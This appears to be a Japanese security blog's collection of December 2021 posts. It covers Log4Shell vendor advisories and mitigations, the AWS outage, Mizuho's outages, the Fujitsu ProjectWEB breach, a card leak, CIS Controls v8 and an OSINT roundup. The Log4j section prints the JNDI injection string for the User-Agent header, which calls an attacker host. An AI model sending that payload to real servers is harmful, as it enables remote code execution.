Javaのログ出力ライブラリ「Apache Log4j」に存在するリモートから悪用可能な脆弱性(CVE-2021-44228)


Log4j: List of vulnerable products and vendor advisories:

2021年12月9日、Apache Log4jのロギング・ライブラリに重大な脆弱性があるというニュースが流れ、概念実証済みの脆弱性が出現しはじめました。

Log4jは、オープンソースのJavaロギングフレームワークで、Apache Logging Servicesの一部として、世界中のベンダーの様々なアプリケーションでエンタープライズレベルで使用されています。

Apacheは、Log4ShellまたはLogJamとも呼ばれる、現在CVE-2021-44228として追跡されている最大深刻度の脆弱性に対処するために、Log4j 2.15.0をリリースしました。

CloudflareとCisco Talosのデータによると、大規模な悪用が始まったのは、悪用コードが自由に利用できるようになってからですが、今月初めから攻撃が検出されています。

Log4Shellの欠陥は、11月24日にAlibabaのクラウドセキュリティチームによって報告されましたが、一部の攻撃者がなぜこれほど早く悪用できたのかは不明です。

Cybersecurity and Infrastructure Security Agency(CISA)のディレクターであるJen Easterly氏は、Log4Shellの脆弱性に関する土曜日の声明で、同機関が民間および公的セクターのパートナーと協力してこの問題に対処していると述べています。

Log4Shell は、Java Naming and Directory Interface (JNDI) インジェクションで、認証されないリモートでのコード実行を可能にします。攻撃者は、ブラウザのユーザーエージェントを次の形式の文字列に変更することで、これを利用することができます。

${jndi:ldap://[attacker_URL]}

この文字列は、被害者のWebサーバーのログに残り、Log4jライブラリがそれを解析すると、攻撃者のURLへのコールバックやリクエストを強制的に実行します。攻撃者は、この文字列を使用して、脆弱なマシンにエンコードされたコマンドやJavaクラスを渡すことができます。


CISAは本日、脆弱性の深刻さとその悪用が容易であることから、Log4Shell攻撃に対する防御を設定するための企業向けガイダンスを発表しました。同機関が推奨するのは、「利用可能なパッチを直ちに適用すること」であり、このプロセスに優先順位をつけることです。

パッチ適用が不可能な場合、同機関は以下の変更を推奨しています。

アプリケーションを起動する Java Virtual Machine コマンドに -Dlog4j2.formatMsgNoLookups=True という文字列を追加して log4j2.formatMsgNoLookups を true に設定する。

この場合、メッセージのフォーマットをルックアップに依存している場合、システムのロギングに影響を与える可能性があるという注意点があります。また、この緩和策はバージョン2.10以降にのみ有効です。

Log4Shellの詳細が判明した直後から、ベンダー各社は自社製品が影響を受けるかどうかの調査を開始し、その結果について情報を提供しています。

Amazon

アマゾンは、いくつかの製品をアップデートし、脆弱性のないバージョンのLog4jコンポーネントを使用するようにし、他の製品もアップデート中であるか、近い将来に新しいバージョンをリリースする予定であると発表しました。

同社は、OpenSearch、AWS Glue、S3、CloudFront、AWS Greengrass、API Gatewayなどの影響を受けるサービスに関する詳細を発表している。

Atlassian

同社の評価によると、オンプレミス製品のデフォルト設定では、悪用されやすい脆弱性はないと考えています。

JMS Appender 機能を有効にするためにデフォルトのログ設定 (log4j.properties) を変更すると、Jira Server & Data Center, Confluence Server & Data Center, Bamboo Server & Data Center, Crowd Server & Data Center, Fisheye, Crucible など一部の製品でリモートコード実行のリスクがもたらされる可能性があるそうです。

Broadcom

同社は、Log4jの脆弱性の影響を受ける複数のシマンテック製品について、緩和策とナレッジベースの記事を公開しました。CA Advanced Authentication、Symantec SiteMinder (CA Single Sign-on)、VIP Authentication Hub、Symantec Endpoint Protection Manager (SEPM)が含まれる。

Cisco

シスコは、Log4Shellの影響を受ける自社製品のリストと、12月14日から一部の製品にパッチを適用するカレンダーを公開しました。

影響を受ける製品は、以下のような様々なカテゴリーに分類されます。
  • ネットワークおよびコンテンツセキュリティ機器(Identity Services Engine、Firepower Threat Defense、Advanced Web Security Reporting Application)
  • コラボレーションとソーシャルメディア(Cisco Webex Meetings Server)
  • ネットワーク管理およびプロビジョニング(Cisco CloudCenter Suite Admin、Data Center Network Manager、IoT Control Center、Network Services Orchestrator、WAN Automation Engine)
  • エンタープライズ ルーティングとスイッチング(Cisco Network Assurance Engine、Cisco SD-WAN vManage)
Citrix

調査は現在も進行中であり、一部の製品については状況が変わる可能性がありますが、シトリックスは、Log4Shellの脆弱性がある製品としてリストアップしていません。

ConnectWise

同社のクラウドサービスであるPerchが、「潜在的な脆弱性を持つ」サードパーティーコンポーネントに依存していることが判明した、とConnectWise社のアドバイザリーには書かれています。

脆弱性のあるサードパーティは、ConnectWiseのStratoZenソリューションで使用されているFortiGuardのFortiSIEMと判明し、同社はホスティングされているStratoZenサーバーへのアクセスを一時的に制限するよう促されました。現在では、ほとんどのサービスへのアクセスが回復しています。

cPanel

フォーラムのスレッドによると、cPanelのSolrプラグインが存在するインスタンスのみが影響を受け、悪用される可能性があるが、ローカルにのみ存在するとのことです。

あるスタッフは、Log4Shellに対する緩和策を含むアップデートがcpanel-dovecot-solrパッケージに用意されていることを発表し、さらに安心感を与えてくれました。

Debian

Debian 9 (Stretch), 10 (Buster), 11 (Bullseye), 12 (Bookworm) にセキュリティアップデートとして、パッチを適用した Log4j パッケージが追加されました、と勧告があります。

Docker

Docker Officialイメージの12個に、脆弱性のあるバージョンのLog4jライブラリが使用されていることが判明しています。couchbase、elasticsearch、logstash、sonarqube、solrが含まれる。

Dockerは、「これらのイメージに含まれるLog4j 2を利用可能な最新バージョンに更新中」であり、他の理由でイメージに脆弱性がない可能性があると述べている。

FortiGuard

同社からのアドバイザリーでは、約12の同社製品に脆弱性があるとされており、そのうち4つの製品についてはすでに修正または緩和措置が展開されているとのことです。

FortiGuardは、FortiSIEM、FortiInsight、FortiMonitor、FortiPortal、FortiPolicy、ShieldXなど他の製品の修正プログラム適用時期について、アドバイザリを更新すると発表している。

F-Secure

エフセキュアのいくつかの製品のWindows版とLinux版の両方がLog4Shellの影響を受けています。Policy Manager (Policy Manager Server コンポーネントのみ)、Policy Manager Proxy、Endpoint Proxy、および Elements Connector です。

同社は、この問題を修正するための管理者向けセキュリティパッチを作成し、それを展開するためのステップバイステップの手順を提供しています。

Ghidra

NSAが提供するオープンソースのリバースエンジニアリングツールは、バージョン10.1へのアップデートを受け、Log4jの依存関係を脆弱性のないイテレーションにアップグレードしています。

IBM

IBMのLog4Shellに関するアドバイザリによると、Admin ConsoleとUDDI Registry Applicationコンポーネント経由で、WebSphere Application Serverバージョン9.0と8.5のみが脆弱性の影響を受け、この問題は解決されているとのことです。

Juniper Networks

ネットワーク会社は、同社の4つの製品が影響を受けることを明らかにした。Paragon Active Assurance、Paragon Insights、Paragon Pathfinder、Paragon Plannerの4製品に影響があることを明らかにしました。

評価は継続中ですが、現段階ではさらに6つの製品が影響を受ける可能性があります。JSAシリーズ、Junos Space Management Applications、Junos Space Network Management Platform、Network Director、Secure Analytics、Security Director (Security Director Insightsは除く)

McAfee

同社はまだ評価を完了しておらず、12製品を審査中であり、関連情報が入手でき次第、アドバイザリーを更新する予定です。

MongoDB

Log4Shellに対してパッチを適用する必要があるのはMongoDB Atlas Searchのみであると、本日更新されたアドバイザリーで同社は指摘しています。

開発元は、パッチを適用する前に悪用された証拠や侵害の指標を発見しなかったと付け加えています。

Okta

Oktaは、Log4Shellの脆弱性によるリスクを軽減するため、Okta RADIUS Server AgentおよびOkta On-Prem MFA Agentのアップデートをリリースし、お客様にアドミンコンソールからの修正プログラムの適用を強く推奨しています。

Oracle

オラクルによると、「いくつかの」自社製品が、どの製品が、いくつの製品が、脆弱性のあるバージョンのLog4jコンポーネントを使用していると公表していない。

同社は、顧客にMy Oracle Support Documentを紹介し、提供されるアップデートを "できるだけ早く "適用するよう強く推奨するセキュリティ警告を発表した。

OWASP Foundation

先日のアドバイザリで、Zed Attack Proxy (ZAP) ウェブアプリのスキャナ 2.11.1 以下のバージョンに、脆弱な Log4j コンポーネントが使用されていることが明らかになりました。

Red Hat

Red Hat は、複数の Red Hat 製品のコンポーネントが Log4Shell の影響を受けることを金曜日に明らかにし、利用可能になり次第、アップデートを適用するよう顧客に強く推奨しています。

勧告に記載されている製品は、Red Hat OpenShift 4および3.11、OpenShift Logging、OpenStack Platform 13、CodeReady Studio 12、Data Grid 8、Red Hat Fuse 7である。

AWSで障害、多数のウェブサイトやアプリに影響(転載)~クラウドを採用するということは、障害発生時に指をくわえて見守るしかないことを覚悟せよ~


アマゾンで障害、多数のウェブサイトやアプリに影響:

Amazon Web Services(AWS)で米国時間2021年12月7日に障害が発生し、複数のウェブサイトやアプリを一部のユーザーが利用できない状態になった。AWSでは、「Disney+」「Robinhood」「Barclays」「Slack」などのサービスに処理能力やストレージを提供している。今回の障害では、ワシントンDCやニューヨーク市を含む米国東海岸の地域に障害発生の報告が集中していた。

障害に関するデータを収集するDown Detectorには、7日の米国東部時間正午前の時間帯に、AWSを利用するサイトの障害報告が1万1000件以上まで急増している様子が示されている。

システムアクティビティーをモニタリングするためのAWSのステータスページには、同社のバージニアにある施設で発生した問題がUS-EAST-1リージョンに影響を与えていると記載されている。その問題は、企業がウェブサイトやアプリを運用するために使用する、複数のAWS製品に影響を与えたようだ。

「根本原因を特定済みで、復旧に向けて鋭意対応している」と更新情報には記されている。

Down Detectorには、数十件のサービスの障害報告も示されているが、そのすべてがAWSの障害が始まった時間から発生している。Amazonそのものに加えて、傘下のサービスである「Ring」「Prime Music」「Alexa」「Chime」や、TicketMaster、Google、McDonald's、Venmo、Cash App、そして米社会保障局のオンラインアカウント用ポータルであるMy Social Securityなども、7日の午前11時頃から障害に見舞われている。

ー2021/12/15追記ー

AWS、12月7日の大規模障害について詳細を報告アーカイブ

みずほFG システム障害頻発で首脳陣一新・・・(転載)~ITを理解できない人が会社を経営するとこうなる~

みずほFG システム障害頻発で首脳陣一新…ついに消滅した「興銀の栄光」

官界通(以下=官):みずほフィナンシャルグループ(FG)の佐藤康博会長(69)と坂井辰史社長(62)が、度重なるシステム障害で利用者に不便と不安を与えた責任で、ようやく辞任を決めたな。2人はみずほの母体の一つ、旧・日本興業銀行の出身。ある興銀OBが「これで、栄光の興銀の歴史は終わる」と嘆いていた。

政界通(同=政):責任は明確だったのに、なぜ体制一新が遅れたの?

財界通(同=財):2人に「辞任は当然」とする一般の感覚が欠けていたからだろう。

官:興銀出身という点が、関係しているのか?

財:そうだと思う。興銀は明治時代に産業振興のために設立された国策銀行で、債券を発行して得た資金で融資を拡大。とくに鉄鋼、造船、化学、電力など巨大な装置を必要とする重工業の発展に貢献した。戦後も金融債の「ワリコー」「リッキー」が富裕層の人気を集め、2002年4月に経営統合でみずほコーポレート銀行に衣替えするまで存在感を維持した。

官:そう、「財界の鞍馬天狗」の異名を持つ中山素平氏をはじめ歴代頭取は、海外や財界でも活躍した。

政:それに比べ、佐藤氏や坂井氏は小粒で、巨大銀行の舵取りを誤ったということか。

■リテールのあるメガのトップは無理だった

財:そこまでは言わないが、大企業金融の世界で育った人が膨大な個人や中小零細の業者をお客に持つメガバンクグループのトップを務めることに、無理があった。数字優先で、統合の相手だった富士銀行系や第一勧業銀行系の支店を減らし、システム要員らの削減へ猛進した。

政:それが、障害頻発の遠因か。

官:金融庁が出した業務改善命令にも、その視点がある。

財:辞任は2人だけでなく、傘下のみずほ銀行の藤原弘治頭取(60)も辞める。ただ、藤原氏の後任は富士出身の加藤勝彦副頭取(56)に決まったが、FGトップは未定だ。

官:金融庁の雰囲気では、興銀出身者が3代続けて就任する可能性はないな。

財:当然だ。今回だけでなく、もう二度とないかもしれない。


【参考】

みずほ銀行及びみずほフィナンシャルグループに対する行政処分について (バックアップ


CSIRTマテリアル(構想フェーズ・構築フェーズ・運用フェーズ)リニューアル



hiro_ retweeted:
CSIRTマテリアル(構想フェーズ・構築フェーズ・運用フェーズ)を更新しました。どうぞご利用ください。^YK jpcert.or.jp/csirt_material…


CSIRT(シーサート: Computer Security Incident Response Team) とは、組織内の情報セキュリティ問題を専門に扱う、インシデント対応チームです。

近年の組織 (企業) の IT 利用の拡大に伴い、情報セキュリティ対策は組織にとって重要な問題となってきています。高度に複雑化し、かつインターネットを介して大容量のデータを瞬時に、しかも容易に世界中とやり取りできる IT システムの利用が一般的になったことで、単に「現場 = システム管理者」の頑張りだけで済む問題ではなくなってきています。例えば、情報システムがコンピューターウイルスに感染してしまったために、顧客の個人情報が世界中にばら撒かれてしまったといった事態を考えてみれば、情報セキュリティの問題が、もはやシステム管理者だけの問題ではなく、経営層が積極的に関与しなければならない問題であることは容易に想像できると思います。このような中で、組織の情報セキュリティ対策として注目されているのが、情報セキュリティの問題を専門に、ただし組織全体の視点から取り扱うCSIRTの構築です。

CSIRTマテリアルは、組織的なインシデント対応体制である「組織内CSIRT」の構築を支援する目的で作成したものです。これから自組織内にCSIRTを構築しようと考えている組織の方が、それまでのインシデント対応経験をもとに、既存の体制を整理したり、見直したりしてCSIRTの構築に繋げる際の参考として頂くことを意図しています。一連の資料では組織内CSIRTが一般的に備えるべき機能や能力等について説明していますが、すべての組織内CSIRTがそれらを達成しなければならないというものではありません。それぞれの組織の状況に応じた適切なCSIRTの形があり、本資料がそれを見つける際の助けとなれば幸いです。


NHK子会社社員を懲戒解雇 2,800万円分チケット換金、私的流用(転載)~経理担当が裏切らないとは限らない。内部不正対策の観点からもゼロトラストの発想が必要~

経理担当が裏切らないとは限らない

NHK子会社社員を懲戒解雇 2800万円分チケット換金、私的流用

仕事で使うと装って旅行会社から新幹線のチケット約2,800万円分をだまし取り、現金化して私的に使ったとして、NHKの子会社NHKグローバルメディアサービスは2021年12月10日、40代の男性社員を懲戒解雇にし、発表した。

同社によると、社員は2021年7月~10月、取引先プロダクションの架空の出張名目で85件約2800万円分のチケットを旅行会社から受け取り、JRの窓口で払い戻して、自身のローンの返済などにあてていたという。代金は未払いで、グローバル社が弁済した。

2017年から今年7月までに同様の方法で購入、現金化したチケットは計約1億5千万円分にのぼり、代金は新たなチケットの払い戻しなどで支払ってきたといい、今回の未払い分も「いずれは返すつもりだった」と話しているという。

同社は告発などについて警察と相談しているといい「あるまじき行為であり、深くおわびいたします。再発防止に向けて全社的な取り組みを徹底してまいります」とのコメントを出した。

スイパラ通販利用者がクレカ不正利用被害に 運営元は「因果関係を調査中」(転載)

スイーツパラダイスの不正アクセス被害

スイパラ通販利用者がクレカ不正利用被害に 運営元は「因果関係を調査中」

「スイーツパラダイスの公式通販サイトを利用した後、クレジットカードが不正利用された」——そんな報告がTwitter上で相次いでいる。スイーツバイキングチェーン店「スイーツパラダイス」を運営する井上商事は報告を受け、2021年12月9日に公式通販サイトを一時閉鎖。取材に対し「事態は認識しており、原因がどこにあるのか確認中」としている。

Twitterでは9日午後8時ごろ、11月下旬に開催されたオンラインゲーム「原神」のコラボカフェイベントなどの際に同サイトでクレジットカード決済を行った人々から、上記のような報告が上がり始めた。海外のショッピングサイトやAppleなどの名義で身に覚えのない引き落としがあったという。



井上商事に問い合わせたところ「Twitterでの報告を見て気付き、被害が拡大しないよう公式通販サイトをメンテナンス中とした」と説明。「問題の原因が当社にあるのか、別のところにあるかを含めて現在調査中」としている。

日本の政府機関が富士通のツールを足掛かりにデータ漏洩の被害を受ける / Japanese government agencies suffer data breaches after Fujitsu hack(転載)~ソリトンの次は富士通かぁ~

Japanese government agencies suffer data breaches after Fujitsu hack

富士通の情報共有ツール「ProjectWEB」を介して、日本の複数の省庁が不正アクセスを受けました。

富士通の発表によると、ProjectWEBを利用したプロジェクトへの不正アクセスが行われ、一部の顧客情報が盗まれたとのことです。

なお、今回の不正アクセスが、脆弱性を狙ったものなのか、サプライチェーンを狙ったものなのかは明らかになっておらず、現在調査を進めています。

攻撃者は、少なくとも76,000件のメールアドレスにアクセス

昨日、国土交通省と内閣サイバーセキュリティセンター(NISC)は、富士通の情報共有ツールを介して攻撃者が内部情報を入手できたことを発表しました。

また、富士通は、攻撃者がProjectWEBを利用したプロジェクトに不正にアクセスし、独自のデータを盗み出したと発表しました。

富士通のProjectWEBは、企業や組織が、プロジェクトマネージャーやステークホルダーなどと、社内で情報を交換することを可能にします。

ProjectWEBログイン画面

ProjectWEBを経由して政府機関のシステムに不正にアクセスすることで、少なくとも76,000件のメールアドレスや、メールシステムの設定などの専有情報を取得することができたことが、国土交通省によって確認されています。

富士通の資料によると、2009年の時点で、このツールは約7,800のプロジェクトで広く使用されていたとのことです。

情報共有ツールの活用例を示す富士通ProjectWEBの概要  

なお、流出した電子メールアドレスには、専門家会議のメンバーなど外部の関係者のものも含まれており、個別に通知を受けています。

成田空港でも、航空管制データやフライトスケジュール、業務に関する情報が盗まれ、影響を受けました。

また、日本の外務省では、情報漏えいにより、一部の研修資料が流出しました。

内閣サイバーセキュリティセンター(NISC)は、富士通のツールを利用している政府機関や重要インフラ組織に対し、不正アクセスや情報漏えいの兆候がないか確認するよう、複数の注意喚起を行いました。

富士通、オンラインポータル「ProjectWEB」を一時停止

富士通は、この問題の範囲と原因を完全に調査している間、ProjectWEBポータルを停止しているとのことです。

ログインポータルへのURLにアクセスしようとするとタイムアウトしてしまいます。


ProjectWEBポータルは「soln.jp」ドメインでホストされていたため、自分の組織が影響を受けているか、あるいはかつて顧客であったかどうかを確認する一つの方法は、ネットワークログにこのドメインや前述のURLの痕跡を探すことです。

富士通は、プレスリリースの中で、関係当局に通知するとともに、顧客と協力して侵害の原因を特定すると述べています。

現在、富士通はこの事件を徹底的に調査しており、日本の当局と緊密に協議しています。富士通の広報担当者は、「予防措置として、このツールの使用を停止し、影響を受ける可能性のあるお客様にはその旨をお伝えしています」と述べています。

この攻撃の技術的な詳細については未定ですが、この事件は、何百もの顧客組織に影響を与えたファイル共有ツール「Accellion」のハッキング事件と似ています。

【参考】

ー12/14追記ー

ランサムウエアギャングLV-BLOGがwww.kobebussan.co.jpのデータをハッキングしたと主張


LV-BLOG https://darkfeed.io/2021/12/11/lv-blog-27/

LV-BLOG

https://darkfeed.io/2021/12/11/lv-blog-27/

株式会社神戸物産(こうべぶっさん、英: KOBE BUSSAN CO.,LTD.)は、兵庫県加古川市に本社を置く日本の企業。主に業務用食品の販売を手がけるフランチャイズチェーン (FC) 方式のチェーンストアである。1981年(昭和56年)創業。小売店舗は「業務スーパー」の名で全国展開しており、当名称は同社の商標となっている。本店については2021年(令和3年)4月3日より加古川市に移転。

なお、広島市に拠点を置く株式会社アクト中食(1911年〈明治44年〉創業)は、当社の「業務スーパー」と業態が同じ店舗「業務用食品スーパー」を瀬戸内地方で展開しているが、互いに無関係である。アクト中食は「業務用食材流通グループ (NCF)」に加盟する企業であり、その意味での「業務用食品」である。

週刊OSINT 2021-44号 / WEEK IN OSINT #2021-44(転載)


 今号もたくさんのテーマで素敵なアップデートが行われました。プライバシーからニュースサイトまで、そして盗まれた美術品からShodanの問い合わせまで。

  • ID-Art Mobile App
  • Craig Silverman Newsletter
  • 360Cities
  • Browser Privacy
  • Google Mobile Friendly Test
  • AllYouCanRead
  • Dark Web Queries for Shodan

ツール: ID-Art Mobile App

Sylvain Hajriさんから、インターポール(国際刑事警察機構)が提供する、盗まれた美術品を特定するための新しいアプリを教えていただきました。このアプリは、データベースにアクセスして、種類、名前、アーティスト、国別に検索することができます。作品の写真を比較した後、作品そのものを通報することもできます。もう一つの機能は、他のオブジェクトやサイトにタグを付けることで、例えば破壊行為に対してタグを付けることができます。ご興味のある方は、アプリの紹介ビデオをご覧いただくか、AndroidまたはiOSでダウンロードしてください。


小技: Craig Silverman Newsletter

クレイグ・シルバーマンがニュースレターを再開することになりました。第1号では、Facebookについての長文のパートがあります。次にosintmeのブログ記事があり、続いてAmazonがウェブストアで自社製品を競合他社よりも押し出していることが紹介されています。そして、最後の項目は再びFacebookについてで、詐欺師たちに素晴らしいプラットフォームを提供しているというものです。次号がどんな内容になるのか楽しみですが、すでに素晴らしいスタートを切っていますね。


サイト: 360Cities

Ritu Gillは絶好調で、自身のTwitterアカウントで素晴らしいリンクを共有し続けています。今回は、360°の画像や動画を集めたサイト「360cities」です。このサイトには、さまざまな視点、豊富なキュレーションセット、そしてギガピクセルギャラリーなどの優れた機能があります。ギガピクセル・ギャラリーといえば、こちらのサイトもお忘れなく。


小技: Browser Privacy

Ritu Gillがシェアしたもう一つのリンク、今回はブラウザのプライバシーについてです。Braveは、スタート画面の肥大化や暗号の自動入力問題など、ここ2、3年でニュースになった話題にもかかわらず、高い評価を得ています。また、Braveにはたくさんの設定項目があるという問題がありますが、これは非常にタイトなもので、真にプライベートなオプションとなりますし、オープンソースです。Chrome、Safari、Edgeなどの標準的なブラウザが苦手な方も、この概要を読めば、他のブラウザやあなたのプライバシーの取り扱いについて十分な情報が得られるでしょう。


小技: Google Mobile Friendly Test

TOCPの10分Tipsのひとつに、LinkedInのプロフィールを匿名で見る方法がありました。また、Googleのモバイルフレンドリーテストが少し見直されたようです。スクリーンショットやHTMLコードを見るには、まず、フレンドリー度の評価の下にあるview tested pageをクリックします。また、サーバーから送られてきたレスポンスヘッダーなど、技術的な情報も掲載されています。


サイト: AllYouCanRead

Nico 'Dutch OSINT Guy' Dekens氏は先日、「AllYouCanRead.com」というとてもクールなサイトを紹介してくれました。このサイトには、新聞、雑誌のほか、クラシファイド、ジョブ、ソーシャルネットワークなどのサイトへのリンクが多数掲載されています。外国で何か情報源を探す必要があるなら、絶対にここを利用すべきだと思います。この素晴らしいサイトに感謝します。


メディア: Dark Web Queries for Shodan

Sinwindieさんが、Shodanを使ってTorサーバーの匿名性を解除するための基本的なテクニックを紹介する動画をアップしました。このビデオでは、オニオンリンクの検索方法、ファビコンを使ったサーバーの検索方法、サーバーからのリクエストとレスポンスのヘッダーがどのようにマッチするかを特定する方法などを紹介しています。これらの基本的なテクニックは、Torサイトの所有者がサーバーを正しく設定していない場合に結果を出すことができ、実際のIPアドレスを見つけることができます。

SplunkをRSSリーダーに仕立てる。。。のメモ(転載)


github.com/LukeMurphey/sp…

================================================
概要
================================================

このアプリは、シンジケーションフィードをSplunkにインポートする仕組みを提供します(RSS、ATOM、RDF)。



================================================
Splunkの設定
================================================

以下の方法で、本アプリをSplunkにインストールします。

  1. Splunk Web にログインし、Splunk のユーザーインターフェースの左上にあるアプリのドロップダウンから「Apps " Manage Apps」に移動します。
  2. install app from file」ボタンをクリックします。
  3. Choose file" をクリックしてファイルをアップロードし、アプリを選択します。
  4. アップロード」ボタンをクリックします。
  5. Splunk の再起動を促すダイアログが表示されたら、Splunk を再起動します。

アプリをインストールしたら、新しい入力を設定することで、アプリを使用することができます。
  1. Splunk のユーザーインターフェースの上部にあるメニューから"Settings » Data Inputs"に移動します。
  2. "Syndication" をクリックします。
  3. "New"をクリックして、入力の新しいインスタンスを作成します。

================================================
サポートを受ける
================================================

サポートが必要な場合は、以下のサイトにアクセスしてください。


このアプリのソースコードや技術的な詳細は、以下のサイトでご覧いただけます。


CIS Controls v8日本語訳をリリース(転載)~ポイントは「リスク管理」から「情報管理」へ~

セキュリティ対策、どこまでやる?CIS Controls v8日本語訳をリリース

米国CIS(Center for Internet Security)が発行しているCIS Controls(シーアイエス コントロール)は、あらゆる規模の組織が活用できる、サイバーセキュリティ対策の具体的なガイドラインです。IT環境の変化や攻撃の高度化に伴い、クラウドコンピューティングやモビリティ、サプライチェーン、テレワーク環境などに対する、新しい攻撃手法への対応を加えたバージョン8が2021年5月18日にリリースされました。

このCIS Controls バージョン8の日本語版が米国CISのWebサイトからダウンロードできます。この記事では、CIS Controlsのコンセプトと活用方法についてご紹介します。

 CIS Controls Version 8(日本語版)のダウンロード

CIS Controlsとは何か

CIS Controlsは、米国のセキュリティ非営利団体であるCISが、企業がサイバーセキュリティ対策として取り組むべきことをまとめたガイドラインです。もともとは2008年にアメリカ国防総省(DoD)とアメリカ国家安全保障局(NSA)が外部脅威による情報漏洩を防ぐガイドラインとして策定を開始したのが始まりです。その後、SANS InstituteやCCSのもとで改訂を重ね、2015年からはCISが管理しています。

CISでは、CIS Controls以外にも様々なフレームワークやツールを提供しています。その中でもサイバーセキュリティ対策に取り組む企業が最初に参照すべきリソースがCIS Controlsです。CIS Controlsは、サイバー攻撃対策に焦点を当て、具体的に何をするべきかを、あらゆる規模の組織が利用できるように書かれています。現状の自社対策レベルを評価し、不足しているところや強化すべき箇所を整理できます。

具体的な実装のベストプラクティスについてはCISの他のドキュメントが参考になります。例えばCIS Benchmarks(ベンチマーク)はOSやミドルウエアの安全な設定に関するベストプラクティス集です。日々、CISとコミュニティがレビューを重ねているので対象となるソフトウエアも増加し、最新バージョンに適合するように更新されています。


CIS Controlsの構成と主なコンセプト

CIS Controlsには、「18のコントロール」と「153の具体的なセーフガード(保護手段)」が記載されています。ITの複雑化と攻撃手法の高度化に伴い、セキュリティソリューションも複雑化しています。CIS Controlsでは、あらゆる規模の組織が適切な優先順位でセキュリティ対策を実施できるよう、対象となる企業を3つのグループに分けています。

最初のグループ(IG1)は、IT資産や人員を保護するためのITおよび、サイバーセキュリティのリソースが限られている中小企業です。次のグループ(IG2)は、システムが取り扱うデータの機密性やサービスのクリティカル度はIG1に属する企業群より高くなり、自社内にITインフラの運用管理とITセキュリティを担当する部署を持つ大企業が該当します。最後のグループ(IG3)ではデータの機密性やサービスのクリティカル度は非常に高くなり、高度なセキュリティ専門部門が必要となります。IG3は公的サービスを提供する企業や業界規制遵守が求められる企業が該当します。

※ IG(Implementation Group):実装グループ


18のコントロールにある「153の具体的なセーフガード(保護手段)」には、IG1からIG3のそれぞれのグループにおいて、その対策が推奨かどうか示されています。企業はこのマトリクスを利用することで、自社のセキュリティ対策が必要な水準に達しているかどうか、現状の対策レベルをアセスメントできます。そして不十分なセキュリティ対策については、対応の優先順位を決めて計画立案できるようになります。


CIS Controlsから感じ取った3つのメッセージ

個々のコントロールと具体的なセーフガード(保護手段)については資料をご覧いただくとして、ここではCIS Controlsのメッセージを3つご紹介します。

平時のIT衛生管理(ハイジーン)の重要性

まず、最初に挙げるのはサイバーセキュリティ対策における「平時の衛生管理の重要性」です。サイバーセキュリティ対策において「平時の衛生管理」とは、「(PCなどの)アセットの把握と管理」、「(利用している)ソフトウエアの把握と管理」、「(保持している)データの把握と管理」、「(ソフトウエアやサービスの)安全な設定」、「アカウントの把握と管理」、「アクセス権の把握と管理」などです。このような当たり前の基本的なことをシッカリと着実に実施することが重要です。

先ほどの実装グループのうち、IG1は「基本的なサイバーハイジーン」であり、「すべての組織が適用すべきサイバー防御の基本的な保護手段のセット」と定義されています。「ハイジーン(Hygiene)」とは「衛生」という意味の英単語です。コロナ禍の感染予防策として「手洗い・うがい」、「マスク着用」、「ソーシャル・ディスタンス」などの平時の衛生管理をキチンと行うことの重要性を多くの方が認識したと思います。サイバーセキュリティ対策においても平時からの衛生管理が重要です。

CISの調査によると、IG1の対策を実装することで、マルウェア、ランサムウェア、Webアプリケーションハッキング、内部特権者の不正と過失、標的型攻撃などの主要なサイバーセキュリティリスクの70%以上を回避できるとされています。詳細については以下のレポートを参照ください。

CIS Introduces v2.0 of the CIS Community Defense Model

サイバーセキュリティ対策の自動化

次に挙げるのは、サイバーセキュリティ対策の「自動化」です。CIS Controlsでは各コントロールの「手順と対策」において、サイバーセキュリティ対策の実装と自動化を可能にするプロセスとテクノロジーについて説明が記載されています。

ここでCIS Controlsが意図している「自動化」はオートメーションというより、ツールなどを使うことで正確な情報を収集し、再現可能性を担保することを意識しているようです。先に記載した平時のIT衛生管理で必要な事(PC、ソフトウエア、アカウント、アクセス権の把握と管理)を着実に繰り返し実施していくためには何らかの自動化ツールが不可欠でしょう。

最新の話題と安定性のバランス

最後に挙げるのは「最新の話題と安定性のバランス」です。IT環境の複雑化と攻撃手法の高度化に伴い、セキュリティソリューションも複雑化してきています。CIS Controlsでは新しい防御技術に目を向ける一方で、あまりに複雑で新しすぎるソリューションについては「真新しいおもちゃ」として除外すると宣言しています。こうした「最新と安定のバランス」がCIS Controlsが支持される理由の1つではないかと考えます。

サイバーセキュリティ対策に関する最新の話題として、「ゼロトラストセキュリティ」に関心が集まっています。バージョン8では「ゼロトラスト」という明確な表現は出てきませんがクラウドの活用やリモートワークを意識した内容になっています。バージョン6(またはそれ以前)のCIS Controlsを使用している場合は、可能な限り早くバージョン8への移行計画を開始することが推奨されています。クラウド活用が進んでいる今こそ、スタンダードをバージョン8に切り替えるべきではないかと考えます。

ー2021/12/12追記ー

■CIS Controls v8で見直されたコンセプトの変更

①「リスク管理」ではなく「情報保護」

v7.1までは「Sub Controls」という表現が使われていたが、v8では「Safeguards」という表現に変わっている。Safeguardsとすることで、より情報を保護する意味合いが強調され、リスクをコントロールするための管理策のままでは、情報保護の実効性が得られないと考えたのではと推察できる。これまでは、管理策としてこういう活動が必要だという記載であったのを「どのように物事を管理していくのか」と踏み込んだ記述になっているのもガイドとしての価値が向上したと考えられる。

②管理策を統合し、抽象度を上げて保護策のカテゴリ数や項目数を減少

カテゴリ数は20から18に減少している。より重要なものが分かるように、また、使いやすいように見直された。

保護策の項目数も171→153に減少、要求事項が少なくなったというより、冗長な記述となっていた個所は統合されており、やや抽象的な表現となっている。例えば、v7.1の「特権IDのログイン失敗ログの検知」や「特権アカウントの追加の通知」という項目は、v8ではまとめて「詳細なログを集める」のような記載となっている。そのため、活用にあたっては、保護策の実施や適用状況の評価に際して自ら評価環境を理解するとともにリスクを特定する必要がある。抽象度が高い保護策は、組織内で行われるべき具体的な対策を自ら考え、その妥当性を評価することになる。この点は、これまでより正しく活用するための難易度を上げたとも考えられる。

③Basic ControlsからBasic Cyber Hygieneに

v7.1ではトップレベルの#1から#6をBasic Controls(基礎的対策)とし、基礎的対策を行うことがサイバー攻撃による侵害のリスクを85%低減されるとされていた。

v8ではBasic Cyber Hygiene(サイバーセキュリティ確保のための基本となる事前対策)として、18のカテゴリそれぞれに、どんな組織も必ず、先行して取り組むべきという推奨保護策が記述されている。53と限定的でより簡単に組織が具体的なセキュリティ対策のための活動に取り組みやすくなっている。

④ネットワークの内と外を区別しない

ゼロトラストアーキテクチャでも強調されていることではあるが、CIS Controls v8においても、インターネットと社内LANを区別する境界防御の表現はなくし、"Network Monitoring and Defense"に変更されている

⑤単なる自動化では不十分、保護策が連携され機能している状態が必要

